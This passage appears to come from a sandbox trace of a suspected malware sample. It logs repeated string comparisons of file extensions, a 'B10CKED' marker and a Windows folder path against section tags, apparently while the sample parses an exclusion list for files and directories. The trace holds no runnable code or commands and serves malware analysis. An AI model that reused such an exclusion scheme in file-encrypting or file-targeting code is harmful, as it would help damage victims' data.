lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", 
cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) 
returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", 
cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 
